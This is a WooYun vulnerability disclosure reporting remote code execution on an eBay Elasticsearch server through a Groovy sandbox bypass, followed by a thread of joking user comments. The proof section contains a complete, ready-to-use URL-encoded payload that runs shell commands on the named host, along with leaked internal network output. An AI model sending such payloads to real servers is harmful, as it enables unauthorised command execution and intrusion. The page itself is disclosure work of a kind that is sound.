当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149512

漏洞标题:eBay Search Scripting Engine Remote Code Execution (Bypass firewall)

相关厂商:eBay Inc.

漏洞作者: 猪猪侠

提交时间:2015-10-26 11:15

修复时间:2015-10-31 11:16

公开时间:2015-10-31 11:16

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

eBay Search Scripting Engine Remote Code Execution (Bypass firewall)

详细说明:

#1 DESCRIPTION

Elasticsearch Groovy Scripting Engine Sandbox Security Bypass Vulnerability
http://www.securityfocus.com/bid/72585
https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released


#2 VULNERABILITY
http://mips-lb02.ebayc3.com/

{
  "status" : 200,
  "name" : "mips-master",
  "cluster_name" : "mips.db",
  "version" : {
    "number" : "1.4.2",
    "build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",
    "build_timestamp" : "2014-12-16T14:11:12Z",
    "build_snapshot" : false,
    "lucene_version" : "4.10.2"
  },
  "tagline" : "You Know, for Search"
}

漏洞证明:

#3 PROOF OF CONCEPT

http://mips-lb02.ebayc3.com/_search?source=%7B%22size%22%3A1%2C%22script_fields%22%3A%20%7B%22iswin%22%3A%20%7B%22script%22%3A%22java.lang.Math.class.forName%28%5C%22java.io.BufferedReader%5C%22%29.getConstructor%28java.io.Reader.class%29.newInstance%28java.lang.Math.class.forName%28%5C%22java.io.InputStreamReader%5C%22%29.getConstructor%28java.io.InputStream.class%29.newInstance%28java.lang.Math.class.forName%28%5C%22java.lang.Runtime%5C%22%29.getRuntime%28%29.exec%28%5C%22netstat%20-an%5C%22%29.getInputStream%28%29%29%29.readLines%28%29%22%2C%22lang%22%3A%20%22groovy%22%7D%7D%7D


es.png


/sbin/ifconfig -a

{"took":242,"timed_out":false,"_shards":{"total":69,"successful":69,"failed":0},"hits":{"total":321,"max_score":1.0,"hits":[{"_index":"mips","_type":"items","_id":"rpp_54c01345e4b076e493788bf5_141165380495","_score":1.0,"fields":{"iswin":[["eth0      Link encap:Ethernet  HWaddr 74:DB:D1:A0:02:08  ","          inet addr:10.65.187.29  Bcast:10.65.187.255  Mask:255.255.255.0","          inet6 addr: fe80::76db:d1ff:fea0:208/64 Scope:Link","          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1","          RX packets:139625117 errors:0 dropped:0 overruns:0 frame:0","          TX packets:72122815 errors:0 dropped:0 overruns:0 carrier:0","          collisions:0 txqueuelen:1000 ","          RX bytes:12956581403 (12.0 GiB)  TX bytes:9237711324 (8.6 GiB)","","lo        Link encap:Local Loopback  ","          inet addr:127.0.0.1  Mask:255.0.0.0","          inet6 addr: ::1/128 Scope:Host","          UP LOOPBACK RUNNING  MTU:16436  Metric:1","          RX packets:100756 errors:0 dropped:0 overruns:0 frame:0","          TX packets:100756 errors:0 dropped:0 overruns:0 carrier:0","          collisions:0 txqueuelen:0 ","          RX bytes:5241172 (4.9 MiB)  TX bytes:5241172 (4.9 MiB)",""]]}}]}}

修复方案:

# update
https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-31 11:16

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-26 11:16 | 残冰 ( 普通白帽子 | Rank:185 漏洞数:27 | 专业爆破5000000000000000000000年)

    板凳

  2. 2015-10-26 11:20 | 梨花带雨 ( 普通白帽子 | Rank:165 漏洞数:55 | 去年今日此门中,人面桃花相映红。人面不...)

    2楼

  3. 2015-10-26 11:24 | Herolon ( 普通白帽子 | Rank:191 漏洞数:43 | ******)

    国际化?

  4. 2015-10-26 11:25 | boooooom 认证白帽子 ( 普通白帽子 | Rank:467 漏洞数:50 | 我有一个好想法!)

    惊呆了,这个也可以搞到啊,万万没想到。

  5. 2015-10-26 11:41 | HackPanda ( 普通白帽子 | Rank:113 漏洞数:15 | Talk is cheap,show me the shell.)

    RCE --

  6. 2015-10-26 11:42 | hecate ( 普通白帽子 | Rank:379 漏洞数:63 | ®高级安全工程师 | WooYun认证√)

    Good job

  7. 2015-10-26 11:59 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    高逼格

  8. 2015-10-26 12:48 | scanf ( 核心白帽子 | Rank:1307 漏洞数:191 | 。)

    走国际化的路了

  9. 2015-10-26 12:55 | phith0n 认证白帽子 ( 核心白帽子 | Rank:662 漏洞数:108 | 一个想当文人的黑客~)

    国际猪

  10. 2015-10-26 12:59 | 路人毛 ( 实习白帽子 | Rank:48 漏洞数:15 | 呵呵)

    现在引进了一只国际猪

  11. 2015-10-26 13:28 | zhiher ( 路人 | Rank:16 漏洞数:4 )

    走国际化的路了

  12. 2015-10-26 13:45 | 随风的风 ( 普通白帽子 | Rank:131 漏洞数:48 | [code]时光如水,总是无言,你若安好,便是...)

    现在引进了一只国际猪

  13. 2015-10-26 14:05 | 炯炯虾 ( 路人 | Rank:2 漏洞数:1 | 我来自地球)

    @路人毛 International pig

  14. 2015-10-26 14:30 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    仰视仰视我们屯里的羊

  15. 2015-10-26 14:42 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:211 漏洞数:70 | 妈妈,我要上电视)

    无间道片场,梁朝伟正坐着休息。刘德华想出去,但觉得梁朝伟有些挡路,于是对他说:“卧底,劳驾。”梁朝伟头也没抬接着唱道:“就住在这个屯。”

  16. 2015-10-26 15:07 | greg.wu ( 普通白帽子 | Rank:862 漏洞数:103 | 打酱油的~)

    是不是elastic search的rce?

  17. 2015-10-26 17:09 | Q1NG ( 普通白帽子 | Rank:101 漏洞数:20 | 临 兵 斗 者 皆 阵 列 前 行 !)

    好高端!

  18. 2015-10-27 08:49 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    我猜,猪哥肯定不只是标题国际化了。。。要是内容详情也国际化了,公开和不公开、核心白帽子和普通白帽子就没什么区别了。。因为都看不懂。。。

  19. 2015-10-27 09:13 | h3hz ( 路人 | Rank:30 漏洞数:3 )

    标题就够劲爆,不知道啥时候公开

  20. 2015-10-27 11:01 | eBay Inc.(乌云厂商)

    猪猪侠您好,非常感谢您提供的漏洞报告!我们系统管理员正在审核该漏洞,我们会尽快回复。

  21. 2015-10-27 11:04 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3572 漏洞数:275 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @eBay Inc. 作为国际厂商,你讲中文,我们很不习惯。

  22. 2015-10-27 13:03 | 天朝城管 ( 普通白帽子 | Rank:116 漏洞数:35 | 不要等到命玩你的时候才开始玩命)

    @猪猪侠 猪哥 这个b装的我给满分

  23. 2015-10-27 16:37 | xsser_w ( 普通白帽子 | Rank:116 漏洞数:34 | 哎)

    @猪猪侠 nice to meet you ,GG bond, how are you ,Im fine,thank you ,and you? we are very glad to recive your report on serious risks in our system,our guys are now analysing your issues,we will reply as soon as we could

  24. 2015-10-31 11:27 | k0_pwn ( 路人 | Rank:2 漏洞数:2 | 专注二进制许多年,突然觉得web才好玩)

    2015-10-31: 厂商已经主动忽略漏洞,细节向公众公开